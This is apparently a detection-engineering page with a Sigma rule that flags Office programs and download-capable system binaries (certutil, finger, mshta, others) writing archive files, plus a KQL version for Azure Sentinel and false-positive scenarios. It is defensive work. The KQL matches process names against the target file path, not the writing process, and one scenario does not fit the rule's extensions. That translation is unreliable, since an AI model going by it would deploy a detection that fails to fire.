Adversaries may drop archives in unexpected locations to exfiltrate data or execute malicious payloads, leveraging legitimate applications to avoid detection. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential data exfiltration or persistence tactics early.
Detection Rule
title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
description: Detects programs on a Windows system that should not write an archive to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
date: 2022-08-21
tags:
- attack.defense-evasion
- attack.t1218
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith:
# Microsoft Office Programs Dropping Executables
- \winword.exe
- \excel.exe
- \powerpnt.exe
- \msaccess.exe
- \mspub.exe
- \eqnedt32.exe
- \visio.exe
- \wordpad.exe
- \wordview.exe
# LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
# - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
# - \expand.exe
- \finger.exe
# Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- \notepad.exe
- \AcroRd32.exe
- \RdrCEF.exe
- \mshta.exe
- \hh.exe
TargetFilename|endswith:
- '.zip'
- '.rar'
- '.7z'
- '.diagcab'
- '.appx'
condition: selection
falsepositives:
- Unknown
level: high
imFileEvent
| where (TargetFilePath endswith "\\winword.exe" or TargetFilePath endswith "\\excel.exe" or TargetFilePath endswith "\\powerpnt.exe" or TargetFilePath endswith "\\msaccess.exe" or TargetFilePath endswith "\\mspub.exe" or TargetFilePath endswith "\\eqnedt32.exe" or TargetFilePath endswith "\\visio.exe" or TargetFilePath endswith "\\wordpad.exe" or TargetFilePath endswith "\\wordview.exe" or TargetFilePath endswith "\\certutil.exe" or TargetFilePath endswith "\\certoc.exe" or TargetFilePath endswith "\\CertReq.exe" or TargetFilePath endswith "\\Desktopimgdownldr.exe" or TargetFilePath endswith "\\esentutl.exe" or TargetFilePath endswith "\\finger.exe" or TargetFilePath endswith "\\notepad.exe" or TargetFilePath endswith "\\AcroRd32.exe" or TargetFilePath endswith "\\RdrCEF.exe" or TargetFilePath endswith "\\mshta.exe" or TargetFilePath endswith "\\hh.exe") and (TargetFileName endswith ".zip" or TargetFileName endswith ".rar" or TargetFileName endswith ".7z" or TargetFileName endswith ".diagcab" or TargetFileName endswith ".appx")Scenario: A system administrator is performing a backup using Veeam Backup & Replication and the backup process temporarily writes a .zip archive to disk as part of the job execution.
Filter/Exclusion: Exclude processes associated with veeam.exe or use a filter based on the backup job name or task ID.
Scenario: A scheduled PowerShell script runs daily to archive log files using Compress-Archive and saves the output to a temporary directory for later processing.
Filter/Exclusion: Exclude processes with the command line containing Compress-Archive or filter by the script name and execution time.
Scenario: A Windows Update installation process creates temporary archive files in the system temp directory as part of the update package extraction.
Filter/Exclusion: Exclude processes with the parent process being svchost.exe or filter by the presence of WindowsUpdate in the process name or command line.
Scenario: A database administrator is using SQL Server Management Studio (SSMS) to export a database to a .bak file, which is a standard backup operation.
Filter/Exclusion: Exclude processes with the command line containing sqlcmd or sqlbackup or filter by the presence of sqlservr.exe as the parent process.
Scenario: A CI/CD pipeline (e.g., Jenkins or Azure DevOps) runs a build task that generates an archive file as part of artifact packaging.
Filter/Exclusion: Exclude processes with the command line containing jenkins.exe, azure-pipelines.exe, or any known CI/CD tool identifier, or filter by the presence of a specific build ID or artifact name.